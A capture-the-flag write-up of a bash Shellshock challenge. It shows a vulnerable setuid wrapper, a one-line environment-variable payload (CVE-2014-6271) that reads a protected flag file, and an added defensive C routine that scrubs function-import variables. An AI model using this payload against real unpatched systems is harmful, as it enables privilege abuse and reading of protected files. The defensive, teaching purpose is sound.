Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)

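The challenge title already gives it away: this is a bash Shellshock vulnerability challenge. After logging in to the challenge host, look at the source code: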

#include <stdio.h>
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}

As expected, we have to use Shellshock to construct the payload. The Shellshock payload is very simple:

$ env a='() { :;}; /bin/cat flag' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

For the details of Shellshock, see Wikipedia.
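
A defensive counterpart to the payload above, as an added example that is not part of the original write-up or the challenge's code: a C helper that a privileged wrapper could call before `system()` to drop environment variables whose value has the function-import shape. The names `looks_like_function_import` and `scrub_function_imports` are hypothetical, and the sample variable is constructed from the payload shown above.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/* Pre-patch bash treats a variable whose value starts with "() {" as an
 * exported function definition; that is the shape of the payload above. */
static int looks_like_function_import(const char *value)
{
    return value != NULL && strncmp(value, "() {", 4) == 0;
}

/* Remove every such variable from this process's environment so a child
 * shell never sees it. Returns the number of variables removed. */
int scrub_function_imports(void)
{
    int removed = 0;
    size_t i = 0;

    while (environ != NULL && environ[i] != NULL) {
        const char *entry = environ[i];
        const char *eq = strchr(entry, '=');
        if (eq != NULL && looks_like_function_import(eq + 1)) {
            char *name = strndup(entry, (size_t)(eq - entry));
            int ok = (name != NULL && unsetenv(name) == 0);
            free(name);
            if (ok) {
                removed++;
                continue;   /* unsetenv shifted the list; re-check slot i */
            }
        }
        i++;
    }
    return removed;
}

int main(void)
{
    /* Constructed sample input: the variable from the write-up's payload. */
    setenv("a", "() { :;}; /bin/cat flag", 1);
    printf("removed %d suspicious variable(s)\n", scrub_function_imports());
    /* Stricter alternative: clearenv(), then setenv() only what is needed. */
    return system("echo child shell runs with the scrubbed environment") == 0 ? 0 : 1;
}
```

Filtering like this is a stopgap; a patched bash and a fixed, minimal environment for the child process are the durable fix.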